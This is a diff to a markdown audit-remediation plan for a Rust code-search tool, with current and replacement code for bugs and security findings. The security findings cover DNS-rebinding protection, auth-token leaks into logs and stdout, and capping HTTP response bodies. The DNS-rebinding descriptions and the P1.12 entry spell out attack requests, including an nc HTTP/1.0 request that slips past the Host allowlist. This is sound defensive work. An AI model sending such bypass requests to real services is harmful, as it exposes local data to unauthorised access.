+    definitions.rs - Clap argument definitions and command enum
+    dispatch.rs - Command dispatch (match on command, call handlers)
+    commands/   - Command implementations (organized by category)
+```
+
+### Replacement (Architecture Overview)
+
+```markdown
+  cli/          - Command-line interface (clap)
+    mod.rs      - Top-level CLI module, re-exports
+    definitions.rs - Clap argument definitions and command enum
+    registry.rs - `for_each_command!` table; single source of truth for dispatch + variant_name + batch_support
+    dispatch.rs - Command dispatch helpers (entry points; per-command arms generated from `registry.rs`)
+    commands/   - Command implementations (organized by category)
+```
+
+---
+
+## P1.5 — ProjectRegistry doc lies about path on macOS/Windows
+
+**Finding:** P1.5 in audit-triage.md / Platform Behavior section
+**Files:** `src/project.rs:1-3, 176-179`
+**Why:** Module-level doc claims `~/.config/cqs/projects.toml` but `dirs::config_dir()` returns macOS-specific (`~/Library/Application Support/`) and Windows-specific (`%APPDATA%\`) paths. Path is constructed correctly; only the doc is wrong.
+
+### Current code (src/project.rs:1-4)
+
 ```rust
-pub fn run_server(store: Store<ReadOnly>, bind_addr: SocketAddr, quiet: bool) -> Result<()> {
-    let _span = tracing::info_span!("serve", addr = %bind_addr).entered();
+//! Cross-project search via global project registry.
+//!
+//! Maintains a registry of indexed projects at `~/.config/cqs/projects.toml`.
+//! Enables searching across all registered projects from anywhere.
+```
 
-    let state = AppState {
-        store: Arc::new(store),
-    };
-    let app = build_router(state);
+### Replacement
 
-    let runtime = tokio::runtime::Builder::new_multi_thread()
-        .enable_all()
-        .build()
-        .context("Failed to build tokio runtime for cqs serve")?;
+```rust
+//! Cross-project search via global project registry.
+//!
+//! Maintains a registry of indexed projects in the platform config directory
+//! (via `dirs::config_dir()`):
+//! - Linux: `~/.config/cqs/projects.toml`
+//! - macOS: `~/Library/Application Support/cqs/projects.toml`
+//! - Windows: `%APPDATA%\cqs\projects.toml`
+//!
+//! Enables searching across all registered projects from anywhere.
+```
 
-    runtime.block_on(async move {
-        let listener = TcpListener::bind(bind_addr)
-            .await
-            .with_context(|| format!("Failed to bind {bind_addr}"))?;
-        let actual = listener
-            .local_addr()
-            .with_context(|| format!("Failed to read local_addr after bind {bind_addr}"))?;
+### Current code (src/project.rs:175-179)
 
-        if !quiet {
-            println!("cqs serve listening on http://{actual}");
-            println!("press Ctrl-C to stop");
-        }
-        tracing::info!(addr = %actual, "cqs serve started");
-
-        axum::serve(listener, app)
-            .with_graceful_shutdown(shutdown_signal())
-            .await
-            .context("axum server failed")?;
-
-        tracing::info!("cqs serve shut down cleanly");
-        Ok::<_, anyhow::Error>(())
-    })?;
-
-    Ok(())
-}
-
-/// Build the axum router. Public-in-crate so integration tests can
-/// exercise the full handler tree against an in-memory store without
-/// binding a TCP port.
-pub(crate) fn build_router(state: AppState) -> Router {
-    Router::new()
-        .route("/health", get(handlers::health))
-        .route("/api/stats", get(handlers::stats))
-        .route("/api/graph", get(handlers::graph))
-        .route("/api/chunk/{id}", get(handlers::chunk_detail))
-        .route("/api/hierarchy/{id}", get(handlers::hierarchy))
-        .route("/api/embed/2d", get(handlers::cluster_2d))
-        .route("/api/search", get(handlers::search))
-        .route("/", get(assets::index_html))
-        .route("/static/{*path}", get(assets::static_asset))
-        .with_state(state)
-        // Gzip every response axum sends. The graph + cluster JSON
-        // payloads compress ~5-10× (1-2 MB → 150-300 KB on the cqs
-        // corpus); vendor JS bundles compress ~3×. Negligible CPU on
-        // the server side, big win on parse/transfer time at the browser.
-        .layer(CompressionLayer::new())
+```rust
+/// Get the registry file path
+fn registry_path() -> Result<PathBuf, ProjectError> {
+    let config_dir = dirs::config_dir().ok_or(ProjectError::ConfigDirNotFound)?;
+    Ok(config_dir.join("cqs").join("projects.toml"))
 }
 ```
 
-**Fix**: Add a Host-header allowlist middleware seeded from `bind_addr`. Accept only loopback hostnames plus the exact `host:port` the server is bound to. DNS-rebinding attacks send `Host: attacker.com` to `127.0.0.1:8080` from a victim's browser; rejecting any Host that isn't on the allowlist closes the class.
-
-Replace `run_server` and `build_router`, and add two helpers:
+### Replacement
 
 ```rust
-pub fn run_server(store: Store<ReadOnly>, bind_addr: SocketAddr, quiet: bool) -> Result<()> {
-    let _span = tracing::info_span!("serve", addr = %bind_addr).entered();
+/// Get the registry file path.
+///
+/// Resolves via `dirs::config_dir()`:
+/// - Linux: `~/.config/cqs/projects.toml`
+/// - macOS: `~/Library/Application Support/cqs/projects.toml`
+/// - Windows: `%APPDATA%\cqs\projects.toml`
+fn registry_path() -> Result<PathBuf, ProjectError> {
+    let config_dir = dirs::config_dir().ok_or(ProjectError::ConfigDirNotFound)?;
+    Ok(config_dir.join("cqs").join("projects.toml"))
+}
+```
 
-    let state = AppState {
-        store: Arc::new(store),
-    };
-    let allowed_hosts = allowed_host_set(&bind_addr);
-    let app = build_router(state, allowed_hosts);
+---
 
-    let runtime = tokio::runtime::Builder::new_multi_thread()
-        .enable_all()
-        .build()
-        .context("Failed to build tokio runtime for cqs serve")?;
+## P1.6 — gather warning hardcodes "200" — lies when CQS_GATHER_MAX_NODES set
 
-    runtime.block_on(async move {
-        let listener = TcpListener::bind(bind_addr)
-            .await
-            .with_context(|| format!("Failed to bind {bind_addr}"))?;
-        let actual = listener
-            .local_addr()
-            .with_context(|| format!("Failed to read local_addr after bind {bind_addr}"))?;
+**Finding:** P1.6 in audit-triage.md / Code Quality
+**Files:** `src/cli/commands/search/gather.rs:200`, `src/gather.rs:153-172` (`gather_max_nodes`)
+**Why:** Text-mode warning says "capped at 200 nodes" but actual cap obeys `CQS_GATHER_MAX_NODES`. With `CQS_GATHER_MAX_NODES=500`, the user sees "capped at 200" while results were capped at 500.
 
-        if !quiet {
-            println!("cqs serve listening on http://{actual}");
-            println!("press Ctrl-C to stop");
+### Current code (src/cli/commands/search/gather.rs:199-201)
+
+```rust
+        if result.expansion_capped {
+            println!("{}", "Warning: expansion capped at 200 nodes".yellow());
         }
-        tracing::info!(addr = %actual, "cqs serve started");
+```
 
-        axum::serve(listener, app)
-            .with_graceful_shutdown(shutdown_signal())
-            .await
-            .context("axum server failed")?;
+### Replacement
 
-        tracing::info!("cqs serve shut down cleanly");
-        Ok::<_, anyhow::Error>(())
-    })?;
+```rust
+        if result.expansion_capped {
+            let cap = cqs::gather::gather_max_nodes();
+            println!(
+                "{}",
+                format!("Warning: expansion capped at {cap} nodes").yellow()
+            );
+        }
+```
 
-    Ok(())
+### Notes
+
+- `gather_max_nodes` is already memoized via `OnceLock` (per `src/gather.rs:153-172`), so this is cheap.
+- Verify that `gather::gather_max_nodes` is `pub`; if not, expose it (`pub fn`) and re-export from `lib.rs` if needed.
+- Stretch goal flagged in audit: surface `expansion_cap_used: usize` on `GatherResult` so `--json` consumers also see the real cap. Out of scope for the easy fix here.
+
+---
+
+## P1.7 — Reranker silently ignores [reranker] config section
+
+**Finding:** P1.7 in audit-triage.md / Code Quality
+**Files:** `src/reranker.rs:127-154` (`Reranker::new`), `src/reranker.rs:61-77` (`resolve_reranker`), `src/reranker.rs:442-446` (`model_paths` calls `resolve_reranker(None)`), production callers `src/cli/store.rs:276`, `src/cli/batch/mod.rs:1274`
+**Why:** `resolve_reranker` accepts `Option<&AuxModelSection>` to thread `Config::reranker` (`src/config.rs:228`) through, but `Reranker::model_paths` always passes `None`. A user `.cqs.toml` `[reranker] preset = "bge-reranker-base"` is silently dropped — user gets default ms-marco-MiniLM with no error or warn.
+
+### Current code (src/reranker.rs:106-154)
+
+```rust
+pub struct Reranker {
+    session: Mutex<Option<Session>>,
+    tokenizer: Mutex<Option<Arc<tokenizers::Tokenizer>>>,
+    model_paths: OnceCell<(PathBuf, PathBuf)>,
+    provider: ExecutionProvider,
+    max_length: usize,
+    expects_token_type_ids: Mutex<Option<bool>>,
 }
 
-/// Build the allowed-Host set for DNS-rebinding protection. Accepts:
-/// - `localhost` / `127.0.0.1` / `[::1]` (with and without port)
-/// - The exact `host:port` the server is bound to
-/// - The bind IP on its own (supports explicit LAN binds like `192.168.x.x:8080`)
-/// Any other `Host` header is rejected with HTTP 403.
-fn allowed_host_set(bind_addr: &SocketAddr) -> std::sync::Arc<std::collections::HashSet<String>> {
-    let port = bind_addr.port();
-    let mut set = std::collections::HashSet::new();
-    for host in ["localhost", "127.0.0.1", "[::1]"] {
-        set.insert(host.to_string());
-        set.insert(format!("{host}:{port}"));
+impl Reranker {
+    /// Create a new reranker with lazy model loading
+    pub fn new() -> Result<Self, RerankerError> {
+        let provider = select_provider();
+        let max_length = match std::env::var("CQS_RERANKER_MAX_LENGTH") {
+            // ... unchanged ...
+        };
+        Ok(Self {
+            session: Mutex::new(None),
+            tokenizer: Mutex::new(None),
+            model_paths: OnceCell::new(),
+            provider,
+            max_length,
+            expects_token_type_ids: Mutex::new(None),
+        })
     }
-    set.insert(bind_addr.to_string());
-    set.insert(bind_addr.ip().to_string());
-    std::sync::Arc::new(set)
+```
+
+### Current code (src/reranker.rs:442-446)
+
+```rust
+    fn model_paths(&self) -> Result<&(PathBuf, PathBuf), RerankerError> {
+        self.model_paths.get_or_try_init(|| {
+            let _span = tracing::info_span!("reranker_model_resolve").entered();
+
+            let resolved = resolve_reranker(None)?;
+```
+
+### Replacement (struct + constructors, src/reranker.rs:106-154)
+
+```rust
+pub struct Reranker {
+    session: Mutex<Option<Session>>,
+    tokenizer: Mutex<Option<Arc<tokenizers::Tokenizer>>>,
+    model_paths: OnceCell<(PathBuf, PathBuf)>,
+    provider: ExecutionProvider,
+    max_length: usize,
+    expects_token_type_ids: Mutex<Option<bool>>,
+    /// Cached config-file `[reranker]` section so `resolve_reranker` honours
+    /// `preset` / `model_path` / `tokenizer_path` set in `.cqs.toml`.
+    section: Option<AuxModelSection>,
 }
 
-/// axum middleware: reject requests whose `Host` header isn't on the allowlist.
-/// SEC-1: closes the DNS-rebinding class (attacker page sends
-/// `Host: evil.com` to `127.0.0.1:8080` — we refuse to serve it).
+impl Reranker {
+    /// Create a new reranker with lazy model loading (config-less; CLI/env only).
+    pub fn new() -> Result<Self, RerankerError> {
+        Self::with_section(None)
+    }
+
+    /// Create a reranker, threading a `[reranker]` config section through to
+    /// `resolve_reranker` so `.cqs.toml` preset / model_path are honoured.
+    pub fn with_section(section: Option<AuxModelSection>) -> Result<Self, RerankerError> {
+        let provider = select_provider();
+        let max_length = match std::env::var("CQS_RERANKER_MAX_LENGTH") {
+            // ... unchanged body ...
+        };
+        Ok(Self {
+            session: Mutex::new(None),
+            tokenizer: Mutex::new(None),
+            model_paths: OnceCell::new(),
+            provider,
+            max_length,
+            expects_token_type_ids: Mutex::new(None),
+            section,
+        })
+    }
+```
+
+### Replacement (model_paths, src/reranker.rs:442-446)
+
+```rust
+    fn model_paths(&self) -> Result<&(PathBuf, PathBuf), RerankerError> {
+        self.model_paths.get_or_try_init(|| {
+            let _span = tracing::info_span!("reranker_model_resolve").entered();
+
+            let resolved = resolve_reranker(self.section.as_ref())?;
+```
+
+### Replacement (callers)
+
+`src/cli/store.rs:276`:
+```rust
+        let r = cqs::Reranker::with_section(config.reranker.clone())
+            .map_err(|e| anyhow::anyhow!("Reranker init failed: {e}"))?;
+```
+
+`src/cli/batch/mod.rs:1274`:
+```rust
+        let r = cqs::Reranker::with_section(config.reranker.clone())
+            .map_err(|e| anyhow::anyhow!("Reranker init failed: {e}"))?;
+```
+
+### Notes
+
+- `AuxModelSection` is owned (`Clone`-able) per `src/config.rs:228`; cloning is cheap (small struct of `Option<String>`s).
+- Need `pub use` of `AuxModelSection` if not already exported from `cqs::` lib; check `src/lib.rs`.
+- Re-export verify: `cqs::Reranker::with_section` must compile from outside the crate root (`cli` is in-crate, fine).
+- Test sites in `src/reranker.rs:712, 718, 772, 823` continue using `Reranker::new()` (no section needed).
+- Add a regression test `with_section_preset_overrides_default` that constructs a `Reranker::with_section(Some(AuxModelSection { preset: Some("bge-reranker-base".into()), .. }))`, calls `model_paths()`, and asserts the resolved repo matches the bge preset (not ms-marco).
+
+---
+
+## P1.8 — Embedder fingerprint falls back to repo:timestamp — cache thrash
+
+**Finding:** P1.8 in audit-triage.md / Error Handling + Data Safety
+**Files:** `src/embedder/mod.rs:435-466`
+**Why:** Three error arms fall back to `format!("{}:{}", self.model_config.repo, ts)` where `ts = SystemTime::now()`. Every restart with a transient hash failure (AV scanner, EBUSY, I/O hiccup) writes cache rows under a NEW timestamp, so subsequent reads miss the cache forever. Cross-slot copy by `content_hash` also breaks because the model fingerprint isn't stable.
+
+### Current code (src/embedder/mod.rs:432-466)
+
+```rust
+                                            hash
+                                        }
+                                        Err(e) => {
+                                            tracing::warn!(error = %e, "Failed to stream-hash model, using repo+timestamp fallback");
+                                            let ts = std::time::SystemTime::now()
+                                                .duration_since(std::time::UNIX_EPOCH)
+                                                .unwrap_or_default()
+                                                .as_secs();
+                                            format!("{}:{}", self.model_config.repo, ts)
+                                        }
+                                    }
+                                }
+                                Err(e) => {
+                                    tracing::warn!(error = %e, "Failed to open model for fingerprint, using repo+timestamp fallback");
+                                    let ts = std::time::SystemTime::now()
+                                        .duration_since(std::time::UNIX_EPOCH)
+                                        .unwrap_or_default()
+                                        .as_secs();
+                                    format!("{}:{}", self.model_config.repo, ts)
+                                }
+                            }
+                        }
+                    }
+                }
+                Err(e) => {
+                    tracing::warn!(error = %e, "Failed to get model paths for fingerprint, using repo+timestamp fallback");
+                    let ts = std::time::SystemTime::now()
+                        .duration_since(std::time::UNIX_EPOCH)
+                        .unwrap_or_default()
+                        .as_secs();
+                    format!("{}:{}", self.model_config.repo, ts)
+                }
+            }
+        })
+    }
+```
+
+### Replacement
+
+Replace each `repo:timestamp` fallback with a stable `repo:fallback:size=<bytes>` (or `:size=unknown`) shape. The size+repo proxy is deterministic across restarts within the same model file.
+
+```rust
+                                            hash
+                                        }
+                                        Err(e) => {
+                                            tracing::warn!(
+                                                error = %e,
+                                                "Failed to stream-hash model, using repo+size fallback (cache may miss until next successful hash)"
+                                            );
+                                            let size = std::fs::metadata(model_path)
+                                                .ok()
+                                                .map(|m| m.len())
+                                                .unwrap_or(0);
+                                            format!("{}:fallback:size={}", self.model_config.repo, size)
+                                        }
+                                    }
+                                }
+                                Err(e) => {
+                                    tracing::warn!(
+                                        error = %e,
+                                        "Failed to open model for fingerprint, using repo+size fallback"
+                                    );
+                                    let size = std::fs::metadata(model_path)
+                                        .ok()
+                                        .map(|m| m.len())
+                                        .unwrap_or(0);
+                                    format!("{}:fallback:size={}", self.model_config.repo, size)
+                                }
+                            }
+                        }
+                    }
+                }
+                Err(e) => {
+                    tracing::warn!(
+                        error = %e,
+                        "Failed to get model paths for fingerprint, using repo-only fallback"
+                    );
+                    format!("{}:fallback:no-path", self.model_config.repo)
+                }
+            }
+        })
+    }
+```
+
+### Notes
+
+- The "model path resolution failed" arm (line 457) cannot read file size (path unknown), so use `:fallback:no-path` as a stable sentinel — still not time-varying.
+- Audit suggests promoting the failure to a hard error. That's a behaviour change with downstream surface (every `Embedder::*` call now returns `Result<&str, EmbedderError>`). Out of scope here; the size-fallback closes the cache-thrash bug without breaking existing call signatures.
+- `cqs doctor` should warn when `model_fingerprint` starts with `:fallback:` — separate small follow-up; cite as `audit doctor warn fallback fingerprint`.
+
+---
+
+## P1.9 — LocalProvider Mutex::into_inner().unwrap_or_default() loses all batch results on poison
+
+**Finding:** P1.9 in audit-triage.md / Error Handling
+**Files:** `src/llm/local.rs:271, 272, 278, 279, 305, 308`
+**Why:** On `Mutex::into_inner` returning `Err` (poison), `unwrap_or_default()` substitutes an empty `HashMap` and `submit_via_chat_completions` reports `succeeded` ≠ map size with no error signal. Downstream `fetch_batch_results` returns `{}` and the user persists nothing.
+
+### Current code (src/llm/local.rs:271-309)
+
+```rust
+        let ok = *succeeded.lock().unwrap();
+        let err = *failed.lock().unwrap();
+        let elapsed_ms = start.elapsed().as_millis() as u64;
+
+        // Fatal-batch check: if every item that talked to the server saw
+        // 401/403 on its first request, the credentials are wrong — abort
+        // with a specific error instead of silently returning an empty stash.
+        let auth_fail = *auth_failures.lock().unwrap();
+        let auth_attempt = *auth_attempts.lock().unwrap();
+        if auth_attempt > 0 && auth_fail == auth_attempt {
+            tracing::error!(
+                url = %self.api_base,
+                "local batch aborted: all {} requests rejected with 401/403",
+                auth_attempt
+            );
+            return Err(LlmError::Api {
+                status: 401,
+                message: format!(
+                    "Authentication rejected at {}; check CQS_LLM_API_KEY",
+                    self.api_base
+                ),
+            });
+        }
+
+        tracing::info!(
+            batch_id = %batch_id,
+            submitted = items.len(),
+            succeeded = ok,
+            failed = err,
+            elapsed_ms,
+            "local batch complete"
+        );
+
+        // Move results into the stash under the batch id.
+        let results_map = results.into_inner().unwrap_or_default();
+        self.stash
+            .lock()
+            .unwrap()
+            .insert(batch_id.clone(), results_map);
+
+        Ok(batch_id)
+    }
+```
+
+### Replacement
+
+```rust
+        // Recover counters even on poison — counts are advisory and dropping
+        // the count to 0 would mask real progress in the "complete" log.
+        let ok = *succeeded.lock().unwrap_or_else(|p| p.into_inner());
+        let err = *failed.lock().unwrap_or_else(|p| p.into_inner());
+        let elapsed_ms = start.elapsed().as_millis() as u64;
+
+        // Fatal-batch check: if every item that talked to the server saw
+        // 401/403 on its first request, the credentials are wrong — abort
+        // with a specific error instead of silently returning an empty stash.
+        let auth_fail = *auth_failures.lock().unwrap_or_else(|p| p.into_inner());
+        let auth_attempt = *auth_attempts.lock().unwrap_or_else(|p| p.into_inner());
+        if auth_attempt > 0 && auth_fail == auth_attempt {
+            tracing::error!(
+                url = %self.api_base,
+                "local batch aborted: all {} requests rejected with 401/403",
+                auth_attempt
+            );
+            return Err(LlmError::Api {
+                status: 401,
+                message: format!(
+                    "Authentication rejected at {}; check CQS_LLM_API_KEY",
+                    self.api_base
+                ),
+            });
+        }
+
+        tracing::info!(
+            batch_id = %batch_id,
+            submitted = items.len(),
+            succeeded = ok,
+            failed = err,
+            elapsed_ms,
+            "local batch complete"
+        );
+
+        // Move results into the stash under the batch id. On poison we recover
+        // the partially-populated map rather than silently substituting an
+        // empty one — losing partial results is worse than the panic risk.
+        let results_map = match results.into_inner() {
+            Ok(m) => m,
+            Err(poisoned) => {
+                tracing::error!(
+                    succeeded = ok,
+                    "results mutex poisoned during local batch — recovering inner state"
+                );
+                poisoned.into_inner()
+            }
+        };
+
+        // Invariant: if results_map.len() != ok, accounting drifted. Surface
+        // it loudly rather than shipping a short stash silently.
+        if results_map.len() != ok {
+            tracing::error!(
+                map_len = results_map.len(),
+                succeeded = ok,
+                "local batch accounting drift: results map size != succeeded count"
+            );
+            return Err(LlmError::Internal(format!(
+                "local batch accounting drift: ok={ok} map_len={}",
+                results_map.len()
+            )));
+        }
+
+        self.stash
+            .lock()
+            .unwrap_or_else(|p| p.into_inner())
+            .insert(batch_id.clone(), results_map);
+
+        Ok(batch_id)
+    }
+```
+
+### Notes
+
+- `LlmError::Internal(String)` — verify this variant exists in `src/llm/mod.rs::LlmError`. If not, add it: `#[error("Internal error: {0}")] Internal(String)`.
+- The `if let Ok(mut map) = results_ref.lock()` at line 196 (worker) intentionally tolerates poison (drops the result) — leave it. The poison cascade fix is the *finalisation* path.
+- The same poison pattern exists at line 393-396 for `auth_attempts/auth_failures` increment inside the worker; that's tracked by P2.35 (RB-V1.30-7) as a separate sweep.
+
+---
+
+## P1.10 — LocalProvider unbounded HTTP body read — OOM on hostile/buggy server
+
+**Finding:** P1.10 in audit-triage.md / Robustness RB-V1.30-1
+**Files:** `src/llm/local.rs:97-100` (Client builder), `src/llm/local.rs:474-487` (`parse_choices_content`), `src/llm/local.rs:490-500` (`body_preview`)
+**Why:** `reqwest::blocking::Client` builder sets timeout + redirect only — no body cap. `resp.json::<Value>()` and `resp.text()` buffer the entire response. A panicked / hostile / misconfigured OpenAI-compat server can return a multi-GB body and OOM the daemon. Up to `local_concurrency()` (≤64) workers compound the risk.
+
+### Current code (src/llm/local.rs:88-115)
+
+```rust
+    pub fn new(llm_config: LlmConfig) -> Result<Self, LlmError> {
+        let _span = tracing::info_span!("local_provider_new").entered();
+
+        let concurrency = local_concurrency();
+        let timeout = local_timeout();
+        let api_key = std::env::var("CQS_LLM_API_KEY")
+            .ok()
+            .filter(|s| !s.is_empty());
+
+        let http = Client::builder()
+            .timeout(timeout)
+            .redirect(reqwest::redirect::Policy::none())
+            .build()?;
+
+        tracing::info!(
+            api_base = %llm_config.api_base,
+            model = %llm_config.model,
+            concurrency,
+            timeout_secs = timeout.as_secs(),
+            auth = api_key.is_some(),
+            "LocalProvider ready"
+        );
+
+        Ok(Self {
+            http,
+            api_base: llm_config.api_base,
+            model: llm_config.model,
+```
+
+### Current code (src/llm/local.rs:474-500)
+
+```rust
+fn parse_choices_content(resp: reqwest::blocking::Response) -> Result<Option<String>, LlmError> {
+    let body: serde_json::Value = resp.json()?;
+    // ... unchanged ...
+}
+
+fn body_preview(resp: reqwest::blocking::Response) -> String {
+    let body = resp.text().unwrap_or_default();
+    let cut = body
+        .char_indices()
+        .nth(256)
+        .map(|(i, _)| i)
+        .unwrap_or(body.len());
+    body[..cut].to_string()
+}
+```
+
+### Replacement (Client builder, lines 97-100)
+
+No change here — keep timeout + redirect. Apply the cap at the read sites instead.
+
+### Replacement (parse_choices_content, lines 474-488)
+
+```rust
+/// Hard cap on response body size. Summary outputs are typically a few hundred
+/// bytes; 4 MiB is ~1000× headroom. Larger bodies are a sign of a misbehaving
+/// or hostile endpoint and we'd rather error than OOM the daemon.
+///
+/// Override via `CQS_LOCAL_LLM_MAX_BODY_BYTES`.
+fn local_max_body_bytes() -> usize {
+    static MAX: std::sync::OnceLock<usize> = std::sync::OnceLock::new();
+    *MAX.get_or_init(|| {
+        std::env::var("CQS_LOCAL_LLM_MAX_BODY_BYTES")
+            .ok()
+            .and_then(|v| v.parse().ok())
+            .filter(|&n: &usize| n > 0)
+            .unwrap_or(4 * 1024 * 1024)
+    })
+}
+
+fn parse_choices_content(resp: reqwest::blocking::Response) -> Result<Option<String>, LlmError> {
+    use std::io::Read;
+    let cap = local_max_body_bytes();
+    let mut buf = Vec::with_capacity(8 * 1024);
+    resp.take(cap as u64 + 1).read_to_end(&mut buf).map_err(|e| {
+        LlmError::Http(format!("response body read failed: {e}"))
+    })?;
+    if buf.len() > cap {
+        return Err(LlmError::Http(format!(
+            "response body exceeds cap ({} > {})",
+            buf.len(),
+            cap
+        )));
+    }
+    let body: serde_json::Value = serde_json::from_slice(&buf).map_err(|e| {
+        LlmError::Http(format!("response body not valid JSON: {e}"))
+    })?;
+    let content = body
+        .get("choices")
+        .and_then(|v| v.as_array())
+        .and_then(|arr| arr.first())
+        .and_then(|first| first.get("message"))
+        .and_then(|m| m.get("content"))
+        .and_then(|v| v.as_str())
+        .map(|s| s.trim().to_string());
+    match content {
+        Some(s) if !s.is_empty() => Ok(Some(s)),
+        _ => Ok(None),
+    }
+}
+```
+
+### Replacement (body_preview, lines 490-500)
+
+```rust
+/// Read up to 2 KiB from an HTTP error response body for log context.
+/// Returns the empty string if the body can't be read or is non-UTF-8.
+/// Hard-capped to bound log spam and prevent OOM on hostile error bodies.
+fn body_preview(resp: reqwest::blocking::Response) -> String {
+    use std::io::Read;
+    const PREVIEW_CAP: u64 = 2 * 1024;
+    let mut buf = Vec::with_capacity(PREVIEW_CAP as usize);
+    if resp.take(PREVIEW_CAP).read_to_end(&mut buf).is_err() {
+        return String::new();
+    }
+    let body = String::from_utf8_lossy(&buf);
+    let cut = body
+        .char_indices()
+        .nth(256)
+        .map(|(i, _)| i)
+        .unwrap_or(body.len());
+    body[..cut].to_string()
+}
+```
+
+### Notes
+
+- `reqwest::blocking::Response` implements `Read`, and the builder's `.take(n)` method on a Read returns a length-capped adapter. The wrapping `take(cap as u64 + 1)` is so we can detect "exceeded cap" by reading 1 byte beyond and bailing.
+- Confirm `LlmError::Http(String)` variant signature; if it requires a typed inner (e.g. `LlmError::Http(reqwest::Error)`), introduce a sibling `LlmError::BodyTooLarge { got: usize, cap: usize }` instead.
+- Add tests per the audit's TC-ADV-1.30-1 (P2.26): `test_oversized_response_body_capped_at_max` and `test_4xx_with_large_body_does_not_buffer_entire_body` in `src/llm/local.rs::tests`.
+
+---
+
+## P1.11 — Auth token leaked into TraceLayer span URI logging
+
+**Finding:** P1.11 in audit-triage.md / Security
+**Files:** `src/serve/mod.rs:195` (`TraceLayer::new_for_http()`), interacts with `src/serve/auth.rs:194-232`
+**Why:** `TraceLayer::new_for_http()` records `http.uri` (full path + query string) on every span. The first browser navigation `GET /?token=<43 chars>` lands the token in the span at DEBUG. Anyone with `RUST_LOG=tower_http=debug` or running under journald sees the token persisted.
+
+### Current code (src/serve/mod.rs:189-196)
+
+```rust
+        // OB-V1.29-5: TraceLayer emits a span per request plus
+        // on-response events with latency + status. Handlers already
+        // log entry via `tracing::info!`; this layer closes the loop
+        // by logging completion, giving per-endpoint latency in the
+        // journal without hand-wrapping every handler body.
+        .layer(TraceLayer::new_for_http())
+}
+```
+
+### Replacement
+
+```rust
+        // OB-V1.29-5: TraceLayer emits a span per request plus
+        // on-response events with latency + status. Handlers already
+        // log entry via `tracing::info!`; this layer closes the loop
+        // by logging completion, giving per-endpoint latency in the
+        // journal without hand-wrapping every handler body.
+        //
+        // SEC: customise MakeSpan to record path only, NOT the full URI —
+        // the `?token=…` query param lands in span fields otherwise and
+        // bleeds the per-launch token into journald / RUST_LOG=debug.
+        .layer(
+            TraceLayer::new_for_http().make_span_with(|req: &axum::extract::Request| {
+                tracing::info_span!(
+                    "http_request",
+                    method = %req.method(),
+                    path = %req.uri().path(),
+                )
+            }),
+        )
+}
+```
+
+### Notes
+
+- The closure drops `query` and `version` fields; if downstream tooling depends on `http.version`, add `version = ?req.version()` (avoid `%` Display because some HTTP version reps may differ across deps).
+- `Request` import: `use axum::extract::Request;` — already imported at top of file (line 25).
+- Add a regression test in `src/serve/tests.rs::auth_tests` that asserts `?token=…` does not appear in any captured tracing event.
+
+---
+
+## P1.12 — enforce_host_allowlist passes through missing Host header — DNS-rebinding bypass
+
+**Finding:** P1.12 in audit-triage.md / Security + Platform
+**Files:** `src/serve/mod.rs:234-251`
+**Why:** Doc-comment justifies missing-Host pass-through as "test ergonomic". HTTP/1.0 doesn't require Host; `nc 127.0.0.1 8080` with `GET /api/chunk/<id> HTTP/1.0\r\n\r\n` reaches the handler with zero allowlist check. Test ergonomics privileged over runtime safety.
+
+### Current code (src/serve/mod.rs:230-251)
+
+```rust
+/// A missing `Host:` header passes through — HTTP/1.1 requires one and
+/// hyper always provides one on real traffic, but unit tests built via
+/// `Request::builder()` without a `.uri()` that includes a host don't
+/// get one synthesized, and we'd rather not break that ergonomic.
 async fn enforce_host_allowlist(
-    axum::extract::State(allowed): axum::extract::State<
-        std::sync::Arc<std::collections::HashSet<String>>,
-    >,
-    req: axum::extract::Request,
-    next: axum::middleware::Next,
-) -> Result<axum::response::Response, axum::http::StatusCode> {
-    let host = req
-        .headers()
-        .get(axum::http::header::HOST)
-        .and_then(|v| v.to_str().ok())
-        .unwrap_or("");
-    if allowed.contains(host) {
-        Ok(next.run(req).await)
-    } else {
-        tracing::warn!(host = %host, "serve: rejected request with disallowed Host header");
-        Err(axum::http::StatusCode::FORBIDDEN)
+    State(allowed): State<AllowedHosts>,
+    req: Request,
+    next: Next,
+) -> Result<Response, (StatusCode, &'static str)> {
+    match req.headers().get(header::HOST) {
+        None => Ok(next.run(req).await),
+        Some(value) => {
+            let host = value.to_str().unwrap_or("");
+            if allowed.contains(host) {
+                Ok(next.run(req).await)
+            } else {
+                tracing::warn!(host = %host, "serve: rejected request with disallowed Host header");
+                Err((StatusCode::BAD_REQUEST, "disallowed Host header"))
+            }
+        }
     }
 }
+```
 
-/// Build the axum router. Public-in-crate so integration tests can
-/// exercise the full handler tree against an in-memory store without
-/// binding a TCP port.
-pub(crate) fn build_router(
-    state: AppState,
-    allowed_hosts: std::sync::Arc<std::collections::HashSet<String>>,
-) -> Router {
-    Router::new()
+### Replacement
+
+```rust
+/// Reject requests with no `Host:` header. HTTP/1.1 requires one; HTTP/1.0
+/// does not, but a no-Host request bypasses DNS-rebinding protection so
+/// we treat it as malformed. Tests must build requests with a Host header
+/// (see `src/serve/tests.rs` fixtures).
+async fn enforce_host_allowlist(
+    State(allowed): State<AllowedHosts>,
+    req: Request,
+    next: Next,
+) -> Result<Response, (StatusCode, &'static str)> {
+    match req.headers().get(header::HOST) {
+        None => {
+            tracing::warn!("serve: rejected request with missing Host header");
+            Err((StatusCode::BAD_REQUEST, "missing Host header"))
+        }
+        Some(value) => {
+            let host = value.to_str().unwrap_or("");
+            if allowed.contains(host) {
+                Ok(next.run(req).await)
+            } else {
+                tracing::warn!(host = %host, "serve: rejected request with disallowed Host header");
+                Err((StatusCode::BAD_REQUEST, "disallowed Host header"))
+            }
+        }
+    }
+}
+```
+
+### Notes
+
+- Existing tests in `src/serve/tests.rs` that use `Request::builder().uri("/foo")` must add `.header(header::HOST, "127.0.0.1:8080")` (or `localhost`) to the builder. Sweep needed:
+  - `grep -n 'Request::builder()' src/serve/tests.rs` and add Host headers to fixtures.
+- Add a positive test `test_missing_host_header_rejected` that builds a request without Host and asserts 400.
+
+---
+
+## P1.13 — Auth token printed to stdout — captured by journald for 30-day retention
+
+**Finding:** P1.13 in audit-triage.md / Security
+**Files:** `src/serve/mod.rs:111-117`
+**Why:** Banner `println!("cqs serve listening on http://{actual}/?token={token}")` writes to stdout. Under systemd `StandardOutput=journal` (default) or container log drivers, the token persists into a 30-day-retention store the user doesn't think about. Token doesn't rotate during a long-lived launch.
+
+### Current code (src/serve/mod.rs:105-128)
+
+```rust
+        if !quiet {
+            // #1096: when auth is enabled, emit the paste-ready URL
+            // (token + bind addr) so a fresh launch is one click away
+            // from being usable. The token appears here once and is
+            // never logged via tracing — auditors can grep for serve
